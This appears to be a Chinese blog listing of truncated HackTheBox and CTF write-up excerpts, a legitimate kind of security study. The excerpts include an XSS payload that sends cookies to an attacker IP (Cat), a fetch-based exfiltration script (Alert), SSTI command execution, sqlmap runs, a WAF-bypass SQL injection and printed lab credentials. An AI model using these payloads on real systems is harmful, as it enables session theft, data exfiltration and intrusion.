HTB-Cypher
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://cypher.htb/ _|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714Output File: E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch\repor ...
HTB-UnderPass
fscan只扫出22 80 110端口
学到一个新的信息搜集的新招
snmpwalk 命令从目标主机 underpass.htb 获取的管理信息库 (MIB) 数据
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950┌──(root㉿kali)-[~]└─# snmpwalk -v1 -c public underpass.htbCreated directory: /var/lib/snmp/cert_indexesiso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) ...
HTB-Administrator
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
1234567891011121314151617181920212223242526272829303132333435363738┌──────────────────────────────────────────────┐│ ___ _ ││ / _ \ ___ ___ _ __ __ _ ___| | __ ││ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / ││ / /_\\_____\__ \ (__| | | (_| | (__| < ││ \____/ |___ ...
HTB-LinkVortex
fscan扫描没什么内容 目录扫描扫到
1http://linkvortex.htb/robots.txt
123456User-agent: *Sitemap: http://linkvortex.htb/sitemap.xmlDisallow: /ghost/Disallow: /p/Disallow: /email/Disallow: /r/
一个登录框,但是暂时利用不起来
fuzz出一个[Launching Soon](http://dev.linkvortex.htb/)
git泄露
githack和githacker拉下来不大一样
可以获取到一些敏感信息泄露
12const email = 'test@example.com';const password = 'OctopiFociPilfer45';
学到了一个新姿势
可以关注/.git/logs/HEAD是对应的上传者的相关信息
10000000000000000000000000000000000000000 299cdb4387763 ...
春秋云境-Delegation
49351f525ae8897b7483fa96b7d7e636b0482393e74a325124c92da6b844194d8ceb360bf02d3b0eacf098f90fbae0f2432d15df2b9a044c5f08b269edf242fe0c9ac8cdc9c3c459858166a4e8d9b45f3a701d5e8b46dc52016b64a2aed601cc4b1f96a4ba843ea594fab347e29cfd4f6eeaba9890feb6e24ab8205a53063ec3d843cfd8e5ac495805bfa1491f28676a518e0666883b603d22f89a545d9f3195d91274b9bd0fbbd6faabfaa43b5e9f667743e8bb546afc97fe31ae747681c2aacd9807b96b906284cea3b7624fcfe5f434452237b9d24e749335d425bddff373956070d59b5c5c048f17cb5b45a2b1b8ea8f0caf0ac837e3c ...
HTB-Cat
fscan
dirsearch扫到git泄露
githacker拉下来
注册账号后发现这里可能有漏洞点
审计代码 这里对出了照片的其他选项做了过滤,因此可以从照片入手
貌似是对MIME头做了检验
下面还有一个白名单
那好像不大好注了
看看别的
在view_cat看到打印了这么多内容
其中这几个在前面看到是被waf过滤过的
那么就可以从用户名入手
1<img src=1 onerror=this.src="http://10.10.16.35:4444/?yiyi="+encodeURIComponent(document.cookie)>
注册登录后注册一只猫
得到审核人员的cookie
替换cookie进入管理员面板
继续审计accept_cat部分的代码,发现没有太多防护措施 且通过config可以看出是sqlite
尝试sqlmap注入一下
12python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite --tables --batch --l ...
HTB-Alert
dirsearch
打开网站 是一个文件上传
只能传markdown文件
尝试xss
尝试访问/messages.php文件并将响应结果传输回攻击机
12345<script>fetch("http://alert.htb/messages.php").then(response => response.text()).then(data => {fetch("http://10.172.29.1:4444/?file_content=" + encodeURIComponent(data));});</script>
通过sharemarkdown获得路径
1http://alert.htb/visualizer.php?link_share=67da848835c9b5.19283533.md
发送给网站管理员
bot点击后弹回内容
url解密得到
1<h1>Messages</h1><ul><li>< ...
XCTF-TPCTF
TPCTF-XCTF rk6
没爆0 输出了一点
supersqli看到这类的waf有点走不动道
第一反应是绕过waf,这里尝试了两种思路
一开始想到是http走私,但是没走成,前后都处理了TE头
https://www.geekby.site/2022/03/waf-bypass/#multipart-%E6%B7%B7%E6%B7%86
想着可以通过这种方式,waf那里把password当成文件,而后端又把password覆盖了
对着这篇文章改了一下,UNION SELECT递归拼接sql语句自身,replace绕过字符限制
123456789101112131415161718192021222324POST /flag/ HTTP/1.1Host: 1.95.159.113Content-Length: 523Cache-Control: max-age=0Origin: http://1.95.159.113Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6 ...
GHCTF2025web
Message in a Bottle
小李收到了来自远方朋友的信件,信中朋友邀请他到一个自己搭建的留言板上留下回信,你能帮他撰写一封温馨而真挚的回信吗?
Bottle框架
https://www.osgeo.cn/bottle/stpl.html
随便写两条发现结构如下
我们可以闭合<div>标签从而执行命令
123</div><small class="message-time">123</small></div>% (__import__('os').popen('tac /flag >456.txt').read())<div class="message-card">=<div class="message-content"></div>
直接执行命令没有回显,反弹shell没成功,于是写入文件用include包含
123</div><smal ...
2025阿里云CTF
ezoj
啊?怎么整个五个算法题给CTF选手做??这我不得不展示一下真正的技术把测评机打穿。 题目环境不出网。
随便穿个包上去
1234567891011121314POST /api/submit HTTP/1.1Host: 121.41.238.106:49629User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/jsonContent-Length: 49Origin: http://121.41.238.106:49629Connection: closeReferer: http://121.41 ...